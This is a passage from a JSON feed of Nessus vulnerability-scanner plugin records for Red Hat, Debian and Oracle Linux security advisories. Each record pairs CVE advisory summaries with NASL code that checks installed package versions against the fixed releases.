flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-accessibility-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"java-1.8.0-openjdk-accessibility-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-accessibility-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-accessibility-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-accessibility-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-debuginfo-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"java-1.8.0-openjdk-debuginfo-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-debuginfo-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-demo-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"java-1.8.0-openjdk-demo-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-demo-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-demo-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-demo-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-devel-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"java-1.8.0-openjdk-devel-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-devel-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-devel-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-devel-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-headless-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"java-1.8.0-openjdk-headless-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-headless-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-headless-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-headless-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"java-1.8.0-openjdk-javadoc-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"java-1.8.0-openjdk-javadoc-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"java-1.8.0-openjdk-javadoc-zip-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"java-1.8.0-openjdk-javadoc-zip-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-src-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"java-1.8.0-openjdk-src-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-src-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"java-1.8.0-openjdk-src-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"java-1.8.0-openjdk-src-debug-1.8.0.242.b08-0.el7_7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk / java-1.8.0-openjdk-accessibility / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-23T02:02:26", "bulletinFamily": "scanner", "description": "An update for openvswitch2.11 is now available for Fast Datapath for\nRHEL 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpen vSwitch provides standard network bridging functions and support\nfor the OpenFlow protocol for remote per-flow control of traffic.\n\nSecurity Fix(es) :\n\n* dpdk: possible memory leak leads to denial of service\n(CVE-2019-14818)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* SyntaxError: Missing parentheses in call to ", "modified": "2020-01-02T00:00:00", "published": "2020-01-22T00:00:00", "id": "REDHAT-RHSA-2020-0171.NASL", "href": "https://www.tenable.com/plugins/nessus/133160", "title": "RHEL 8 : openvswitch2.11 (RHSA-2020:0171)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2020:0171. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133160);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2020/01/22\");\n\n script_cve_id(\"CVE-2019-14818\");\n script_xref(name:\"RHSA\", value:\"2020:0171\");\n\n script_name(english:\"RHEL 8 : openvswitch2.11 (RHSA-2020:0171)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for openvswitch2.11 is now available for Fast Datapath for\nRHEL 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpen vSwitch provides standard network bridging functions and support\nfor the OpenFlow protocol for remote per-flow control of traffic.\n\nSecurity Fix(es) :\n\n* dpdk: possible memory leak leads to denial of service\n(CVE-2019-14818)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* SyntaxError: Missing parentheses in call to 'print' (BZ#1751161)\n\n* [ovsdb-server] Allow replicating from older schema servers\n(BZ#1760763)\n\n* ovs-tcpundump doesn't work well on special packet (BZ#1764125)\n\n* ovs-tcpundump -V won't exit (BZ#1764127)\n\n* measure the time needed by ovn-controller to resync to a new SB db\n(BZ# 1780729)\n\n* [ovs2.11] SSL connections drops are constantly logged in\novsdb-server-nb.log (BZ#1780747)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2020:0171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-14818\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:network-scripts-openvswitch2.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch2.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch2.11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch2.11-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch2.11-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch2.11-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-openvswitch2.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-openvswitch2.11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2020:0171\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL8\", cpu:\"s390x\", reference:\"network-scripts-openvswitch2.11-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"network-scripts-openvswitch2.11-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"s390x\", reference:\"openvswitch2.11-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"openvswitch2.11-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"s390x\", reference:\"openvswitch2.11-debuginfo-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"openvswitch2.11-debuginfo-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"s390x\", reference:\"openvswitch2.11-debugsource-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"openvswitch2.11-debugsource-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"s390x\", reference:\"openvswitch2.11-devel-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"openvswitch2.11-devel-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"openvswitch2.11-test-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"s390x\", reference:\"python3-openvswitch2.11-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"python3-openvswitch2.11-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"s390x\", reference:\"python3-openvswitch2.11-debuginfo-2.11.0-35.el8fdp\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"python3-openvswitch2.11-debuginfo-2.11.0-35.el8fdp\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"network-scripts-openvswitch2.11 / openvswitch2.11 / etc\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-23T02:02:43", "bulletinFamily": "scanner", "description": "An update for python-reportlab is now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nPython-reportlab is a library used for generation of PDF documents.\n\nSecurity Fix(es) :\n\n* python-reportlab: code injection in colors.py allows attacker to\nexecute code (CVE-2019-17626)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "modified": "2020-01-02T00:00:00", "published": "2020-01-22T00:00:00", "id": "REDHAT-RHSA-2020-0197.NASL", "href": "https://www.tenable.com/plugins/nessus/133168", "title": "RHEL 6 : python-reportlab (RHSA-2020:0197)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2020:0197. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133168);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2020/01/22\");\n\n script_cve_id(\"CVE-2019-17626\");\n script_xref(name:\"RHSA\", value:\"2020:0197\");\n\n script_name(english:\"RHEL 6 : python-reportlab (RHSA-2020:0197)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for python-reportlab is now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nPython-reportlab is a library used for generation of PDF documents.\n\nSecurity Fix(es) :\n\n* python-reportlab: code injection in colors.py allows attacker to\nexecute code (CVE-2019-17626)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2020:0197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-17626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected python-reportlab, python-reportlab-debuginfo and /\nor python-reportlab-docs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-reportlab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-reportlab-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-reportlab-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2020:0197\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-reportlab-2.3-3.el6_10.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-reportlab-2.3-3.el6_10.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-reportlab-debuginfo-2.3-3.el6_10.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-reportlab-debuginfo-2.3-3.el6_10.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"python-reportlab-docs-2.3-3.el6_10.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-reportlab / python-reportlab-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-22T22:52:23", "bulletinFamily": "scanner", "description": "Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 ", "modified": "2020-01-02T00:00:00", "published": "2020-01-22T00:00:00", "id": "DEBIAN_DLA-2073.NASL", "href": "https://www.tenable.com/plugins/nessus/133150", "title": "Debian DLA-2073-1 : transfig security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2020/01/22\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-23T01:37:08", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2020:0127 :\n\nAn update for thunderbird is now available for Red Hat Enterprise\nLinux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 68.4.1.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey type confusion with StoreElementHole and\nFallibleStoreElement (CVE-2019-17026)\n\n* Mozilla: Bypass of @namespace CSS sanitization during pasting\n(CVE-2019-17016)\n\n* Mozilla: Type Confusion in XPCVariant.cpp (CVE-2019-17017)\n\n* Mozilla: Memory safety bugs fixed in Firefox 72 and Firefox ESR 68.4\n(CVE-2019-17024)\n\n* Mozilla: CSS sanitization does not escape HTML tags (CVE-2019-17022)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "modified": "2020-01-02T00:00:00", "published": "2020-01-22T00:00:00", "id": "ORACLELINUX_ELSA-2020-0127.NASL", "href": "https://www.tenable.com/plugins/nessus/133153", "title": "Oracle Linux 8 : thunderbird (ELSA-2020-0127)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:0127 and \n# Oracle Linux Security Advisory ELSA-2020-0127 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133153);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2020/01/22\");\n\n script_cve_id(\"CVE-2019-17016\", \"CVE-2019-17017\", \"CVE-2019-17022\", \"CVE-2019-17024\", \"CVE-2019-17026\");\n script_xref(name:\"RHSA\", value:\"2020:0127\");\n\n script_name(english:\"Oracle Linux 8 : thunderbird (ELSA-2020-0127)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2020:0127 :\n\nAn update for thunderbird is now available for Red Hat Enterprise\nLinux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 68.4.1.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey type confusion with StoreElementHole and\nFallibleStoreElement (CVE-2019-17026)\n\n* Mozilla: Bypass of @namespace CSS sanitization during pasting\n(CVE-2019-17016)\n\n* Mozilla: Type Confusion in XPCVariant.cpp (CVE-2019-17017)\n\n* Mozilla: Memory safety bugs fixed in Firefox 72 and Firefox ESR 68.4\n(CVE-2019-17024)\n\n* Mozilla: 